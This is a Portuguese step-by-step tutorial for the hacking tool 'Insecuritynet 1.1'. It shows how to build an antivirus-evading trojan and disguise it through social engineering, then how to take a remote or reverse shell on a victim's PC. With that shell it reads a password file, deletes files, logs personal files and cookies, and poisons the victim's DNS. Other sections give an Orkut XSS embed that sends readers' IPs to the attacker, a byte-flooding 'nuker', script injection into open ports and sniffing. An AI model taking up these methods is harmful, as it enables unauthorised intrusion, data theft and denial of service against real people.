Vous êtes sur la page 1sur 49

TCP IP

Hacking
Insecuritynet 1.1

Tutorial Insecuritnet 1.1


-

O que o Insecuritynet
Invadindo Computadores
Invadindo por Conexo Reversa
Capturando um IP com XSS
Conectando em Servidores
Redirecionando Endereos de Sites
Procurando portas abertas.
Bombardeando um IP
Injetando um script em uma porta
Sniffer
Ping por Faixa de IP
Capturando Dados da rede local
Abrindo uma porta de seu computador.

Software Insecuritynet TCP IP View


O software Insecuritynet possibilita o gerenciamento dos protocolos TCP/IP.
Para quem no sabe este o protocolo usado na internet e ele divido em varias camadas..
etc..
Portanto se voce sabe como visualizar, configurar TCP/IP consequentimente voce saber
como usar as falhas para Invadir computadores, Interceptar dados, Visualizar conexes, etc.
Voce saber como feita a comunicao de dados na internet.
Mas mesmo se voce no um expert em TCP/IP voce podera fazer tudo isto com o
insecuritynet de uma forma muito pratica.
Ento vamos ao que interessa, vamos ver o que o insecuritynet 1.1.

Caractersticas do software:
1- Ele possui varias ferramentas para conexo remota, voc pode se conectar outro
computador e ter acesso total a maquina via prompt de comando.
Esta conexo tambm pode ser secreta (atravs de um trojan indetectavel gerado pelo
software)
2- Alem da conectar em outra maquina voc ter controle total sobre as configuraes TCP
IP e as conexes de sua maquina.
3- Possui varias ferramentas como: port scan, nuker, ping por faixa de IP, http em escuta.
4- O software cria um diretrio de trabalho onde sera salvo todos os arquivos e Logs
gerados.
5- Tudo isto atravs de um janela do prompt que voc pode escolher as cores que voc mais
gosta. O programa no tem interface grfica, o que muito melhor se tratando de TCP IP, e
a navegao pratica e intuitiva.
6- O software para Windows XP e totalmente em portugus

Download:
Tamanho 27,3 MB
Sistema: Windows XP
http://www.insecuritynet.com/Download.html
IMPORTANTE: Baixe apenas do site oficial (Livre de virus)
Alguns anti-virus (como o NOD32) pode detectar o insecuritynet porque ele cria trojans,
possui sniffer. Para sua segurana baixe apenas do site oficial, mesmo se seu Anti-virus
detectar, no site oficial do software seguro.
No site voc tambm encontra um manual on line totalmente em portugus, tutorias de
como criar os trojans, como capturar IP no orkut, vdeo aulas...

Como registrar
Voc pode baixar o software e usar normalmente, porem algumas funes s funcionam
com o software registrado.
Tutorial de como registrar:
http://www.insecuritynet.com/Registro.html

Site Oficial do Software


http://www.insecuritynet.com
No site voce encontra:
Manual, Tutoriais, Video-aulas, Download, etc.
Se voce ainda tiver alguma Dvida, add o msn:
insecuritynet@hotmail.com
ou mande um email para:
contato@insecuritynet.com

Invadindo Computadores com trojan


O insecuritynet gera um trojan indetectavel.
ENTENDENDO O QUE UM TROJAN
Trojan ou Cavalo de Tria um programa que age como a lenda do cavalo de tria.
entrando no computador , e liberando uma porta para um possvel invasor.
Os trojans atuais so divididos em duas partes: o servidor e o cliente Normalmente, o
servidor est oculto em algum outro arquivo e, no momento que esse arquivo executado,
o servidor se instala e se oculta no computador da vtima; a partir deste momento, o
computador pode ser acessado pelo cliente, que ir enviar informaes para o servidor
executar certas operaes no computador da vtima.
Resumindo :
Servidor o vrus trojan q vai se instalar no pc da vtima
Cliente o insecuritynet que esta no seu computador.
E vc precisa de um endereo para conectar o servidor ao cliente ,este endereo o IP

Caractersticas do Trojan Insecuritynet


Indetectavel por nenhum antivrus 30/08/2008
O Inet utiliza uma forma intida de camuflagem, somente o trojan Inet usa este novo
mtodo.
Voc escolhe como o trojan vai iniciar no computador da vitima.
As opes so:
Iniciar junto com o windows,
Iniciar junto com o messenger,
Agir quando ele for executado,
Agir quando ele for executado e iniciar junto com o windows

Ferramentas do trojan
Acesso total ao computador remoto via prompt de comando
Voc pode fazer o que quiser: criar pasta, deletar arquivos, mover arquivos, abrir
programas, etc.
Criar log de arquivos pessoais do computador remoto.
O trojan Inet 1.1 cria um log com todos os arquivos pessoais da vitima, e voc pode baixar
este arquivo para anlise. Assim voc no perde tempo procurando.
DNS SpoofVoc pode envenenar a navegao de internet do computador remoto,
voc pode fazer a vitima digitar um endereo se um site e ser redirecionado
automaticamente para o site que voc escolher.
- Cookies
Voc visualiza os cookies do Internet Explorer e do Firefox no computador remoto.

Ferramentas > trojan (criando o trojan)

Escolha a opo 1 criar trojan

Escolha a opo 1 criar trojan

Vamos usar a opo 3 (inicia quando o trojan for executado e toda vez que o Windows for
iniciado)

Vamos compactar nosso trojan, digite S

O nome do trojan que eu escolhi vdeo_legal

Pronto, nosso trojan est prontinho na nossa pasta de trabalho.

Vamos descompactar.

Agora voc camufla o trojan do jeito que voc preferir, usando joiner, winrar, engenharia
social, etc.

Conectando-se ao trojan
Depois que voc enviou o trojan e tiver certeza que ele foi executado, ai voc pode se
conectar a ele. Para isto necessrio voc saber o IP do computador remoto.

Escolha a opo 2

Digite o IP do computador remoto

Agora temos varias opes, vamos ver uma a uma.

1- Abrir Shell CMD

Pronto, ganhamos a Shell.

O C:\ todo nosso.


Vamos ver o quem no C:
Digite DIR

Vamos at a conta do usurio atual logado no pc.


Digite:
CD %HOMEPATH%

DIR

Vamos at o Desktop
CD Desktop

DIR

Deletando um arquivo:
Vamos deletar o arquivo contatos.txt

Pronto o arquivo contatos.txt no esta mais no diretrio, ele j foi deletado.

Procurando outros Drivers:


Vamos at o D:
Basta digitar D:

Pronto o D: existe e temos total controle sobre ele.


Listando os arquivos
DIR

Vamos visualizar o arquivo _senha_msn.txt


TYPE _senha_msn.txt

Resumindo, podemos fazer o que quiser no computador remoto via prompt.


PRINCIPAIS COMANDOS DE NAVEGAAO
dir : lista todos os arquivos no diretrio local.
cd <diretrio> : entra em um diretrio.

cd.. : Volta para o diretrio anterior.


md <nome_do_diretrio> :cria um diretrio.
rd <diretrio> :deleta um diretrio.
del <arquivo> :deleta um arquivo.
type <arquivo> : exibe o contedo de um arquivo.
copy <arquivo> <diretrio_de_destino> :copia um arquivo para outro diretrio.
start (aplicativo_ou_site) :abre um aplicativo ou um website.
Estes so apenas os principais comandos, mas existem muitos mais, os comandos so os
mesmo do prompt. Para saber todos v at o prompt de comandos e digite help.
Para sair digite: exit

Quando voc sai o IP do computador remoto fica registrado momentaneamente, portanto


voc no precisa reconectar tudo novamente. Agora vamos voltar (opo 3 )
O Trojan insecuritynet possibilita voc criar um log com todos os arquivos pessoais da
vitima.
Ele no cria automaticamente para voc ter a opo de escolher a hora que voc quer que
este log seja criado. Vamos criar o log.

Digite 2

Digite o IP remoto e tecle enter

Aguarde alguns minutos

O log foi criado no computador remoto.


Feche a janela de criao do log

Vamos copiar a log para o nosso computador


Digite 3
Siga as etapas.

Aguarde alguns minutos e feche esta janela.


Agora que j baixamos o log, vamos visualizar ele em nosso computador.

digite 4

Aperte a barra de espao para voc ir vendo todos os arquivos pessoais do computador
remoto.

Observe os dados do sistema:

Cookies do Internet Explorer

Cookies do Firefox (no tem)

Tambm podemos salvar o log em nossa pasta de trabalho

digite 5

DNS SPOOF
Outra funo interessante do trojan InsecurityNet o DNS SPOOF
Vamos fazer com que o computador da vitima redirecione um endereo de site para o site
que a gente quiser.
Por exemplo: O www.orkut.com ser redirecionado para o www.linux.com
Primeiro vamos pegar o IP do www.linux.com , vamos usar o ping
O IP 216.34.181.51

Agora vamos spoofar o computador remoto.

Digite 6

tecle enter

Pronto URL Spoofada


No computador remoto o site o orkut aparecer assim:

Invadindo por Conexo Reversa


Conexo reversa quando o Computador remoto que se conecta ao computador local.
Ou seja, o trojan faz a vitima se conectar gente, uma das vantagens deste trojan que no
precisamos do IP da vitima.
Devemos utilizar este trojan quando a vitima esta dentro de uma rede privada, porque para
entrar no computador, primeiro teramos que invadir a rede para depois invadir o
computador da vitima. Com a conexo reversa fica tudo mais fcil pois a vitima que ir
se conectar gente.

Criando um trojan de conexo reversa

Digite 4

Digite 1
Para criar o trojan de conexo reversa necessrio sabermos nosso IP, pois o trojan ir se
conectar em nosso computador.

Digite seu IP e tecle enter

Pronto criamos o trojan, ele esta em nossa pasta de trabalho.

O trojan s vai se conectar neste seu IP, se voc tiver IP Dinmico depois que que voc saiu
da Internet e entrou novamente ele no mais vai funcionar.
Para ficar mais organizado o trojan criado com o nome do seu IP.

Depois voc renomeia o trojan e camufla do seu jeito.


ENVIANDO O TROJAN DE CONEXAO REVERSA
IMPORTANTE : Antes de enviar o trojan voc deve abrir a escuta em seu insecuritynet
Vamos abrir a escuta:

Digite 2
Ser aberto duas janelas

Agora enviamos e trojan e aguardamos ele ser executado


Observe, quando o trojan foi executado ele se conectou em nossa escuta

Pronto ganhamos a Shell


Na tela azul digitamos os comandos
Na tela amarela visualizamos a resposta dos comandos
Exemplo, vou listar os arquivos de C:
Basta digitar DIR na janela azul que os arquivos aparecem na janela amarela.

Com este trojan voc tem acesso total ao computador remoto


PRINCIPAIS COMANDOS DE NAVEGAAO
dir : lista todos os arquivos no diretrio local.
cd <diretrio> : entra em um diretrio.
cd.. : Volta para o diretrio anterior.
md <nome_do_diretrio> :cria um diretrio.
rd <diretrio> :deleta um diretrio.

del <arquivo> :deleta um arquivo.


type <arquivo> : exibe o contedo de um arquivo.
copy <arquivo> <diretrio_de_destino> :copia um arquivo para outro diretrio.
start (aplicativo_ou_site) :abre um aplicativo ou um website.
Estes so apenas os principais comandos, mas existem muitos mais, os comandos so os
mesmo do prompt. Para saber todos v at o prompt de comandos e digite help.
Como deu para perceber, o programa insecuritynet no deixa opes de boot no trojan de
conexo reversa como no trojan convencional, mas isso proposital devido aos motivos:
- Existe toda uma preparao para realizar a conexo
- Antes do trojan ser executado voc precisa estar com a escuta aberta, portanto no teria
lgica colocar ele para iniciar junto com o Windows ou algum software, voc no saber
quando a vitima vai ligar o computador
- A grande maioria dos IPs so dinmicos, e voc faz o trojan para se conectar naquele
nico IP, Se voc desconectar e conectar da Internet seu IP j outro e seu trojan no vai
conectar.

Capturando um IP com XSS


O XSS, ou Cross Site Scripting um mtodo onde voc insere seu script em um site, forun,
etc, de modo que quando a pessoa ler o seu post o seu script ser executado
automaticamente.
Vamos um em exemplo prtico no Orkut.

1) Abra seu insecuritynet e v em: > Computador local > IP Local


Copie seu IP

Para copiar clique com o boto direito no mouse selecione Marcar, selecione o IP e tecle
enter. No Ctrl C
2) Agora v em > Web > Ferramentas Online
Abra o site e v em Esconda seu Link

3) Cole o seu este link http://seuip e crie novo link


Obs: seuip o ip que voc pegou em Computador local > IP Local

Clique em Criar Link

4) Agora envie um scrap para seu amigo com este cdigo:


<embed src="link_que_vc_criou"></embed>
Obs: "link_que_vc_criou" o link que voc criou em Esconda seu Link

5) Agora v em seu insecuritynet na opo Ferramentas > HTTP em escuta.

No precisa gerar log.


Deixe a escuta aberta.

6) Agora pea para seu amigo ler o scrap, quando ele ler os dados IP e navegador dele
seram enviados para sua escuta de HTTP.
Tambem sero enviados os dados de qualquer pessoa que visualizar a pagina de recados de
seu amigo.

Observe o IP acima:
"Host: 192.168.1.103"

Conectando em Servidores
O Insecuritynet tambm oferece varias ferramentas para voc se conectar um servidor.
CONECTAR EM UM SERVIDOR

1 - Cliente FTP
um cliente comum por linha de comandos.
Vamos abrir um FTP de exemplo: ftp.xpg.com.br

Comandos FTP
!

delete

literal

prompt

send

debug

ls

put

append

dir

mdelete

pwd

trace

ascii

disconnect

mdir

quit

type

bell

get

mget

quote

user

binary

glob

mkdir

recv

verbose

bye

hash

mls

remotehelp

cd

help

mput

rename

close

lcd

open

rmdir

status

Para sair digite quit


COMANDOS FTP
COMANDO

SINTAXE

DESCRIO
Executa COMANDO na mquina local.

! COMANDO

No prompt do ftp, os comandos digitados so,

a princpio, executados na mquina remota.


Para executar um comando na mquina local
preceda o mesmo com o !
ascii

Configura o tipo de transferncia de arquivos


para ASCII. o valor padro

bell

Emite um bip quando um comando


completado

binary

Configura o tipo de transferncia de arquivos


para binrio.

bye

bye

Encerra a sesso ftp e retorna ao interpretador


de comandos

cd

cd DIRETRIO

Muda o diretrio de trabalho para


DIRETRIO

cdup

Muda para o diretrio que est um nvel acima


do direttio atual

chmod

chmod MODO ARQUIVO

Altera as permisses de ARQUIVO de acordo


com MODO.

close

close

Encerra a sesso ftp e retorna ao interpretador


de comandos

delete

delete ARQUIVO

Apaga ARQUIVO

dir DIRETRIO
ARQUIVO-LOCAL

Lista o contedo de DIRETRIO colocando o


resultado em ARQUIVO-LOCAL, que um
arquivo na sua mquina. Se DIRETRIO no
for especificado, ser listado o contedo do
diretrio atual. Se ARQUIVO-LOCAL no for
especificado a listagem ser enviada para a
tela.

get ARQUIVO-REMOTO
ARQUIVO-LOCAL

Baixa ARQUIVO-REMOTO para sua mquina


com o nome de ARQUIVO-LOCAL. Se
ARQUIVO-LOCAL no for especificado o
arquivo ser baixado com o mesmo nome que
tem na mquina remota.

help

help COMANDO

Descreve sumariamente o COMANDO. Se este


no for especificado ser exibida a lista de
todos os comandos.

lcd

lcd DIRETRIO

Muda o diretrio de trabalho na mquina local.

ls

Lista o contedo de DIRETRIO colocando o


resultado em ARQUIVO-LOCAL, que um
arquivo na sua mquina. Se DIRETRIO no
ls DIRETRIO ARQUIVOfor especificado, ser listado o contedo do
LOCAL
diretrio atual. Se ARQUIVO-LOCAL no for
especificado a listagem ser enviada para a
tela.

ascii
bell
binary

cdup

dir

get

mdelete
mdir

mdelete ARQUIVOS

Apaga ARQUIVOS

mdir DIRETRIOS
ARQUIVO-LOCAL

Semelhante a dir, porm lista o contedo de


vrios diretrios

mget ARQUIVOS

Semelhante a get, porm baixa vrios arquivos

mkdir

mkdir DIRETRIO

Cria um diretrio com o nome de DIRETRIO

mls

mls DIRETRIOS
ARQUIVO-LOCAL

Semelhante a ls, porm lista o contedo de


vrios diretrios

mode

mode MODO

Configura o modo de transferncia de arquivos


para MODO. O modo padro "stream"

modtime ARQUIVO

Exibe a hora da ltima modificao de


ARQUIVO

mput ARQUIVOS

Semelhante a put, porm envia vrios arquivos

newer

newer ARQUIVO-REMOTO
ARQUIVO-LOCAL

Substitui o ARQUIVO-LOCAL pelo


ARQUIVO-REMOTO se a hora de
modificao do ARQUIVO-REMOTO for
mais recente

nlist

nlist DIRETRIOS
ARQUIVO-LOCAL

Semelhante a nls

put

put ARQUIVO-LOCAL
ARQUIVO-REMOTO

Envia ARQUIVO-LOCAL para o servidor ftp


nomeando-o como ARQUIVO-REMOTO. Se
ARQUIVO-REMOTO no for especificado o
arquivo ser enviado com o nome de
ARQUIVO-LOCAL

pwd

pwd

Exibe o caminho completo(PATH) do diretrio


atual

quit

quit

Semelhante a bye

recv

recv ARQUIVO-REMOTO
ARQUIVO-LOCAL

Semelhante a get

reget ARQUIVO-REMOTO
ARQUIVO-LOCAL

Semelhante a get com a diferena que se


ARQUIVO-LOCAL existe e menor que
ARQUIVO-REMOTO, reget considera que
ARQUIVO-LOCAL ARQUIVO-REMOTO
parcialmente transferido e contiua a
transferncia do arquivo. Muito til quando se
baixa arquivos grandes.

remotehelp COMANDO
rhelp COMANDO

Semelhante a help, porm solicita ajuda ao


servidor ftp

mget

modtime
mput

reget

remotehelp
rhelp

remotestatus remotestatus ARQUIVO


rstatus
rstatus ARQUIVO

Exibe a situao de ARQUIVO. Se ARQUIVO


no for especificado, exibe a situao da
mquina remota.

rename

rename NOME-ANTIGO
NOME-NOVO

Renomeia um arquivo

rmdir

rmdir DIRETRIO

Apaga DIRETRIO

send

send ARQUIVO-LOCAL
ARQUIVO-REMOTO

Semelhante a put

size

size ARQUIVO

Exibe o tamanho de ARQUIVO

status

status

Exibe a situao atual do servidor ftp

system

system

Exibe o tipo de sistema operacional da


mquina remota

type

type TIPO

Configura o tipo de transferncia de arquivos


para TIPO. O padro ASCII. Se TIPO no for
especificado, ser mostrada a configurao
atual

? COMANDO

Semelhante a help

2 - Abrir FTP (explorer)


Abre um FTP diretamente em seu Explorer, como se fosse uma conexo de rede.
E voc tem duas opes de login (annimo e normal)
Esta opo bem mais pratica se voc for para fazer manuteno em websites, mas se for
procurar vulnerabilidades melhor pelo prompt mesmo.
Vamos abrir uma conta publica de FTP: ftp.microsoft.com com login annimo

Explorer:

Estas Pastas no esto em meu computador, mas sim no host de FTP da microsoft.

3 - Abrir conexo com Servidor HTTP


Abre uma conexo com um servidor HTTP simulando um navegador de internet.

Observe que o InsecurityNet exibe as resolues dos DNSs e mostra o real servidor onde o
site esta hospedado. E depois exibe o cdigo fonte HTML do site.
4 - Abrir conexao com Servidor SMTP
Servidor SMPT o servidor responsvel pelo envio de emails.
Vamos abrir um conexo com o servidor do gmail: smtp.gmail.com

observe: 250 mx.google.com at your service ( ao seu servio )


mx a maquina responsavel pelo envio de emails
Comandos SMTP:
HELO (HELLO) (Obrigatrio)
Identifica o Emissor da mensagem para o Receptor.
MAIL(Obrigatrio)
Este comando inicializa uma transao de mail na qual uma mensagem enviada a uma ou
mais caixa de mensagems (mailbox).
RCPT (ReCiPienT)(Obrigatrio)

Este comando identifica o destinatrio da mensagem; mltiplos destinatrios so definidos


por mltiplos usos desse comando.
DATA(Obrigatrio)
Inicializa a transmisso da mensagem, aps seu uso transmitido o contedo da mensagem,
que pode conter qualquer um dos 128 caracteres ASCII. O seu trmino especificado por
uma sequncia "<CRLF>.<CRLF>".
RSET (ReSET)(Obrigatrio)
Este comando determina que a operao atual de mail dever ser abortada. Todos os dados
referentes so descartados.
SEND
Este comando usado para inicializar uma transao de mail na qual uma mensagem
enviada para um ou mais terminais onde estejam os destinatrios e no para os seus
mailboxes. um comando alternativo ao comando MAIL
SOML (Send Or MaiL)
Este comando usado para inicializar uma transao de mail na qual uma mensagem
enviada para um ou mais terminais onde estejam os destinatrios ou a seus mailboxes. A
mensagem derecionada aos terminais dos destinatrios ativos no momento (e aceitando
mensagens) caso contrrio direcionada aos seus mailboxes. alternativo ao comando
MAIL.
SAML (Send And MaiL)
Este comando usado para inicializar uma transao de mail na qual uma mensagem
enviada para um ou mais terminais dos destinatrios e aos seus mailboxes. A mensagem
derecionada aos terminais dos destinatrios ativos no momento (e aceitando mensagens) e a
todos os mailboxes.
VRFY (VeRiFY)
Este comando solicita ao Receptor-SMTP a confirmao de que o argumento identifica um
usurio conhecido. Se for identificado retornado o nome completo do usurio (se este
possuir) e seu mailbox completo.
EXPN (EXPaNd)
Este comando solicita ao Receptor-SMTP a confirmao de que o argumento identifica
uma lista de usurios de mail (mailing list). Se for identificada sero retornados os
membros desta lista no mesmo formato retornado pelo comando VRFY.
HELP
Este comando faz com que o Receptor-SMTP envie informao de ajuda ao EmissorSMTP.

NOOP(Obrigatrio)
Este comando no possui efeitos nem parmetros. Apenas faz com que o receptor envie um
OK.
QUIT(Obrigatrio)
Este comando determina que o Receptor-SMTP envie um OK e ento feche o canal de
comunicao com o Emissor-SMTP.
TURN
Este comando faz com que o Receptor e o Emissor troquem de papis, o Receptor fica
como Emissor e o Emissor como Receptor.
5 - Abrir conexo com Servidor POP
Servidor POP o servidor responsvel pelo recebimento de emails.
Podemos abrir um caixa de email diretamente no Insecuritynet.
Exemplo vou abrir minha conta de email.
Vamos ler um email do BOL

Vou entrar no email edinhojd@bol.com.br


User edinhojd
Senha XXXX

Observe, abri a caixa de email e abri o nico email que tinha:

Isto o email como ele realmente .


COMANDOS POP
-------------------user usuario
pass senha
---------------------list (listar)
retr 1 (ler)
dele 1 (deletar)
quit (sair)
6 - Abrir conexo com Servidor HTTPS
til apenas para testar a conectividade do servidor porque todos os dados em HTTPS so
criptografados.

7 - Abrir conexo com Servidor TELNET


Servidor telnet serve no apenas para conexo remota, existem alguns servios que ainda
usam telnet.
Exemplo: conecte no servidor: towel.blinkenlights.nl

o filme Star Wars em ASCII

8 - Port Scan (Principais Portas de servidores)


Voce digita o dominio e feito um scan nas principais portas de servidores.
Exemplo: google.com

Redirecionando Endereos de Sites


DNS SPOOF LOCAL

Antes de tudo vamos ver o que DNS.


Vamos abrir um site de exemplo: www.linux.com
Este endereo corresponde um IP (216.34.181.51) os computadores trabalham com Ips ..
o URL apenas para facilitar nossa vida .Imagina voc ter que ficar decorando um monte
de IP, um IP para cada site.
Por causa disto existe os servidores DNS, quando voc digita um site no seu navegador, o
seu PC envia uma requisio para um servidor DNS perguntando que IP este endereo,
ai o servidor responde com o IP e vc conecta neste IP.
Mas tambm existe uma coisa chamada cach DNS Local.O cach local registra os IP
correspondentes aos sites que voc j entrou, assim nem sempre o seu computador precisa
ficar enviando requisio a um servidor DNS .Os Sites visitados ficam com o Ip registrado
no chache DNS em seu computador mesmo.
O Insecuritynet tem uma ferramenta que permite voc visualizar, apagar e envenenar seu
chache DNS.
1 - Limpar cache DNS Local
Exclui todo seu cache DNS, assim toda vs que voc abrir algum site seu computador vai
conectar um servidor DNS at o cache ir sendo refeito. legal limpar o cache quando
voc tiver algum problema de resolver URLs e o site no abre.
2 - Visualizar cache DNS Local
Visualiza todo seu cache bom para voc ter um controle e no se tornar vitima de psing.

3 - Envenenar cache DNS Local


Envenena seu cache, ou seja, coloca um IP falso para um determinado site.
Exemplo: Vamos fazer o endereo "www.microsoft.com.br" abrir o site da LINUX
Primeiro vamos pegar o IP do "www.linux.com", para isto basta pingar o site.

Observe que a resposta do ping veio com o IP do site (216.34.181.51)


Agora vamos SPOOFAR nosso cache DNS

Agora vamos abrir o site "www.microsoft.com.br" no navegador.

Pronto. DNS Spoofado.

Procurando portas abertas.


Ferramentas > Port Scan
Faz um scan no computador remoto procura de portas abertas.
Opes do port scan:

Principais Portas faz um scan das portas mais comuns


Porta especifica voc pode definir qual porta voce quer scanear
Faixa de portas voc pode definir um faixa, exemplo: fazer um scan da porta 30 at a
porta 60, todas as portas neste intervalo sero scaneadas. Este scan de faixa de portas mais
rpido do que o da opo Computador Remoto
Observe a porta 34 aberta:

Bombardeando um IP
Ferramentas > Nuker
Nuker era muito usado quando Banda Larga de internet era iten de Luxo.
Vrios servidores eram muito frgeis a este tipo de ataque. O principio do nuker simples:
Ele dispara bombardeio de Bytes ao seu alvo, se o alvo no tiver banda suficiente para
processar todos os bytes ele cai.
Observe este exemplo:

Foram 8 disparos de 65000 bytes cada um, com um intervalo de 4 segundos paa cada
disparo. Como deu para ver o servidor de google bloqueou e no respondeu aos disparos.
uma forma de proteo a este tipo de ataque.
Agora o mesmo exemplo com um computador pessoal:

Injetando um script em uma porta


Ferramentas > Script Injection
Com o script injection voce pode injetar qualquer exploiter em qualquer porta TCP UDP
aberta de qualquer IP remoto.
Primeiro voc deve criar seu exploiter antes de conectar no computador remoto, monta no
bloco de notas mesmo.
Vou criar um badcom mesmo, nesta linguagem fica bem mais facio entender.

Este script cria um pasta no Desktop, cria um arquivo de texto com uma mensagem. Copia
todos os arquivos do Desktop para esta pasta, deleta todos os arquivos do Desktop e Depois
abre o site do insecuritynet.
Depois que terminamos o script vamos at a opo de script injection no Insecuritynet.

Agora vamos at nossa pasta de trabalho e abrimos o arquivo script.txt

Agora colamos nosso script neste arquivo (script.txt) o Insecuritynet vai injetar tudo que
esta neste arquivo no IP que a gente escolher.
Sabemos que o IP 192.168.1.103 esta com a porta 34 aberta para a Shell CMD.exe

Agora s clicar ENTER que todo o script que a gente fez sera executado no Computador
192.168.1.103
Observe o script sendo injetado.

Este exemplo com um script inofensivo e com uma porta muito vulnervel a isto.
Mas podemos usar o Injection para exploitar alguma falha em um servio comum como
FTP, Netbios, etc. Para isto voc precisar ter o exploiter prontinho, ou voc souber
programar pode criar o seu. O script injection tambm pode ser usado como brute force,
basta colocar a Word list no script.

Sniffer
Ferramentas > Sniffer
Capture dados que trafega em sua rede e em seu computador.
IMPORTANTE: O Sniffer ir capturar toda informao que trafega em seu computador,
portanto seu Anti-Virus no ir permitir, para usar o sniffer, primeiro pause seu anti-virus.
O inet 1.0 te da opo de gerar log ou no e tambm voc pode escolher se quer os dados
em Hexadecimal ou no.
Depois que voc decidiu como ele vai apresentar os resultados voc precisa decidir entre:
Sniffer comum (toda rede)
Definir um IP
Definir Porta Especifica
Pacotes ICMP
Vou usar o opo sniffer comum sem log e exibindo os resultados em hexadecimal:

Observe que cada pacote TCP que trafega possui:


Hora, origem, destino e porta.

Se a gente quiser deixar snifando por horas basta confirmar a opo de gerar logs.
O log ser criado em sua pasta de trabalho

Ping por Faixa de IP


Ferramentas > Ping > Ping por faixa de IP
Ping uma coisa comum muita gente at acha intil, mas no insecuritynet tem uma opo
de ping diferente, o ping por faixa de IP.
Voc pode pingar toda uma rede de forma automatizada e criar um log com o status de
todos os computadores da rede.
Primeiro vamos entender o que faixa de IP:
Os trs primeiros dgitos do IP de certa forma ir representar toda rede, exemplo:
O IP 192.168.1.205 pertence rede 192.168.1
Dentro desta rede pode haver 255 Ips, ou seja: de 192.168.1.1 192.168.1.255
O ping do Insecurityne pinga toda esta faixa de IP, basta voc digitar os trs primeiros
dgitos do IP.
Aps voc digitar e clicar (ENTER) Um log sera gerado em sua pasta de trabalho:

Capturando Dados da rede local


Obtenha dados de sua rede local de uma maneira muito pratica.

1 - Exibir Computadores da Rede


Exibe os computadores conectados em seu grupo de trabalho
2 - Exibir Diretorios Compartilhados de um PC da rede
Voc digita o nome ou IP de um computador de rede e ser exibido todos os
compartilhamentos deste computador, voc tem a opo de criar um log com os arquivos. O
log gerado em sua pasta de trabalho.

3 - Abrir Diretorios Compartilhados


Voc pode mapear um drive virtual em seu computador para acessar um diretrio
compartilhado na rede.
Exemplo vou mapear o diretrio mids em meu X:

Observe meu X://

4 Servidor
Se seu computador estiver em rede com um servidor de internet, exibe o nome e o IP do
servidor.
5 - Horrio do Servidor
Exibe o Horrio do servidor, isto importante porque existem contas que s podem ser
logadas em certos horrios por medida de segurana, e o relgio do servidor estiver errado
pode acontecer problemas na hora de logar.

6 - Exibir a ID de classe DHCP


O DHCP (Dynamic Host Configuration Protocol) um servio utilizado para automatizar
as configuraes do protocolo TCP/IP nos dispositivos de rede (computadores,
impressoras, hubs, switchs, etc., ou seja, qualquer um dispositivo ligado rede que esteja a
utilizar o protocolo TCP/IP)
7 - Exibir Tabela de roteamento IP
Exibe rotas ativas em seu computador.
8 Ping
um ping comum para verificar o status de algum computador da rede.
9 - Estatisticas do servidor (PC Local)
Exibe Sesses aceitas, Sesses com tempo limite excedido, Sesses com erros, KB
enviados, KB recebidos, Tempo mdio de resposta (mseg), Erros de sistema, Violaes de
permisses,Violaes de senha, Acessos a arquivos, Acessos a dispositivos de
comunicao, Trabalhos de impresso no spool, Buffers esgotados, Buffers grandes,
Buffers de requisio
10 - Diretorios compartilhados (PC Local)
Todos os diretrios compartilhados em seu computador
11 - Servicos ativos (PC Local)
Todos os servios ativos, isto importante porque a ausncia de algum servio pode afetar
sua conexo de rede.
12 - Usuarios com acesso ao server (PC Local)
Exibe todos os usurios de seu computador que tem acesso rede
13 - Conexes com o PC local
Todas as conexes de rede ativas em seu computador
14 - Todos os compartilhamentos da rede
Exibe todos os diretrios compartilhados na rede de todos os computadores.

Abrindo uma porta de seu computador


Computador Local > Abrir uma Porta de conexo
No seu computador existem muitas portas de conexo, voc pode abrir qualquer uma,
quando voc abre esta porta qualquer computador do mundo pode ter acesso ao seu
computador por esta porta. Portanto no deixe a porta aberta sem necessidade.
Para fechar a porta basta fechar a janela que aparece quando voc abre a porta.